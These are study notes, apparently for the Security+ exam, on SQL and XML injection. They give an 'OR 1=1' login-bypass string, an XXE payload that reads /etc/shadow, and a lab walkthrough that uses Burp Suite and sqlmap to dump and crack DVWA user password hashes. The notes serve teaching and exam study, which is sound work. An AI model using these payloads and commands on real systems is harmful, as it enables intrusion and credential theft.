SQL and XML Injections
(OBJ 2.3 & 2.4)
Injection Attack
- Involves sending malicious data to a system for unintended consequences
- SQL injection and XML injection share the goal of inserting code into systems for malicious actions
SQL (Structured Query Language) Injection
-
SQL Data
- Used to interact with databases
- Databases use SQL as the way to read and write information
- Four main SQL actions
- Select
- Used to read data from the database
- Insert
- Used to write data into the database
- Delete
- Used to remove data from the database
- Update
- Overwrite some data in the database
- Select
- Example statement
SELECT * FROM USERS WHERE userID = 'Jason' AND password ='pass123';- This information will go into the database and then will determine if there is a perfect match
- If there is a match, we are going to have access granted
- Used to interact with databases
-
SQL Injection
- Involves inserting malicious SQL code into input fields
- Code Injection: The insertion of additional information or code through a data input form from a client to an application
- Attackers use URL parameters, form fields, cookies, POST data, or HTTP headers for SQL injection
- Prevention
- Input validation
- Sanitize user data
- Use a web application firewall
- Will be able to perform input sanitization and input validation for you even if you can't rewrite the application's code itself.
- SQL Injection Attempt
- Involve statements like "
‘ OR 1=1" - Example
-
Original SQL statement
SELECT * FROM USERS WHERE userID = 'Jason' AND password = 'pass123';
-
Injected SQL statement
SELECT * FROM Users WHERE userID = 'Jason' AND password = '' OR 1=1;
/CAP/Security+/Visual%20Aids/Pasted%20image%2020250713182403.png)
- Access will be granted, you just performed an SQL Injection
- This
'acts as an escape character, so the system ends up evaluating whether what I entered as the password was a match for the password for Jason, OR does 1=1? This is a True statement! so you will always be granted access.- See Ch. 1.1 Propositional Logic
- This was Input Validation
-
- Involve statements like "
XML (Extensible Markup Language) Injection
-
XML Data
- Used for data exchange in web applications
- Should be sent within an encrypted tunnel, like TLS
- Input validation and sanitization are crucial for protection
- If you submit XML data without encryption you are exposed to:
- Snooping
- Spoofing
- Request forgery
- Injection of arbitrary code
- Appears as tagged fields
- Example
<?xml version="1.0" encoding="UTF-8"?> <question> <ID>SECURITY-002-0001</ID> <title>Is this an XML vulnerability?</title> <choice1>Option 1</choice1> <choice2>Option 2</choice2> </question> >/xml?- Can be configured with whatever fields you want
- There is nothing malicious in this example
-
XML Exploits
- XML Bomb (Billion Laughs Attack)
- XML encodes entities that expand to exponential sizes
- Consumes memory exponentially, acting like a denial-of-service attack
/CAP/Security+/Visual%20Aids/Pasted%20image%2020250713183457.png)
- Pattern continues all the way long
- Consumes up to 3 GB memory (this example)
- XXE (XML External Entity) Attack
- Attempts to read local resources, like password hashes in the shadow file
- Embeds a request for a local resource
- Example
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "file:///etc/shadow">]> <foo>Some data</foo>- This XML entity is trying to read the shadow file of a Linux machine, which contains password hashes for that system's accounts
- XML Bomb (Billion Laughs Attack)
-
Prevention
- Implement proper input validation
Exam Tip:
- Determine if a piece of code is HTML, JavaScript or XML
- If you see something like a 'Font', 'Image', 'Href', this is going to be HTML
- If you see something like 'question', 'ID', 'type', 'element', 'entity', this is going to be XML
Conducting an SQL Injection
- We first need an SQL injection vulnerable website or database
- Look at Damn Vulnerable Website
- Run it inside a metasploitable 2 virtual machine
- Look at Burp Suite
- We want to be able to wrap the information thrown by the web app, stop it from being set to the web server from my browser by using my web proxy, and then I can capture the data from it that I need.
- Go to 'Proxy' tab inside Burp Suite and turn Intercept on.
- Now configure your web browser to actually use that proxy
- Go to 'Preferences'
- Go to 'Advance' -> 'Network' -> 'Settings'
- Set up Manual Proxy configuration
- Use the localhost address: 127.0.0.1 on port 8080
- This will tell it to use our Burp Suite tool
- Now when we submit, we don't get the answer back in our web browser, it hasn't actually made a connection to the web server that's gonna give me that info, instead it sends it to Burp Suite which captured it
/CAP/Security+/Visual%20Aids/Pasted%20image%2020250713230143.png)
- It tells you the security level, and PHPSESSID
- Now we are going to use
sqlmap -u "website_url.../dvwa/vulnerabilities/sqli/?id=2&Submit=Submit# --cookie="security=low; PHPSESSID=ab289a1ba9fe..."
Example using sqlmap -u command:
[user@localhost ~]$ sqlmap -u "website_url.../dvwa/vulnerabilities/sqli/?id=2&Submit=Submit# --cookie="security=low; PHPSESSID=ab289a1ba9fe..."
-
Say Yes and start querying database trying to do different injections
-
Now see everything we have found
/CAP/Security+/Visual%20Aids/Pasted%20image%2020250713230648.png)
- Tells you info about our target
Example using sqlmap -u ... --dbs command:
[user@localhost ~]$ sqlmap -u "website_url.../dvwa/vulnerabilities/sqli/?id=2&Submit=Submit# --cookie="security=low; PHPSESSID=ab289a1ba9fe..." --dbs
-
Adding the flag
--dbsat the end -
It will go through and find what databases are on that server
/CAP/Security+/Visual%20Aids/Pasted%20image%2020250713231015.png)
- Note it found 7 different databases
Example using sqlmap -u ... -D ... command:
[user@localhost ~]$ sqlmap -u "website_url.../dvwa/vulnerabilities/sqli/?id=2&Submit=Submit# --cookie="security=low; PHPSESSID=ab289a1ba9fe..." -D dvwa --table
-
To select a database on this server use the
-Dflag and indicate the name of the database you want to select -
Then to enumerate it for the table, to figure out what tables exist inside that database put
--tables- Will tell you what tables are associated with it
/CAP/Security+/Visual%20Aids/Pasted%20image%2020250713231326.png)
- Finds two tables: 'guestbook' and 'users'
Example using sqlmap -u ... -D ... -T ... command:
[user@localhost ~]$ sqlmap -u "website_url.../dvwa/vulnerabilities/sqli/?id=2&Submit=Submit# --cookie="security=low; PHPSESSID=ab289a1ba9fe..." -D dvwa -T users --columns
-
To dump the columns from those tables use the
-Tflag and indicate the table you want and then use--columns/CAP/Security+/Visual%20Aids/Pasted%20image%2020250713231616.png)
- We now have six columns, the user, avatar, first_name, last_name, password, and user_id
Example using sqlmap -u ... -D ... -T ... command:
[user@localhost ~]$ sqlmap -u "website_url.../dvwa/vulnerabilities/sqli/?id=2&Submit=Submit# --cookie="security=low; PHPSESSID=ab289a1ba9fe..." -D dvwa -T users --dump
-
To go a little bit further, take out the word
--columnsand put the word--dump -
It will grab any password hashes from the password column and it's going to attempt to do a dictionary attack to crack them.
-
It will ask to use standard dictionary (1), use common password suffixes (n)
/CAP/Security+/Visual%20Aids/Pasted%20image%2020250713232023.png)
- We have our passwords!
- This is the power of SQL Injection!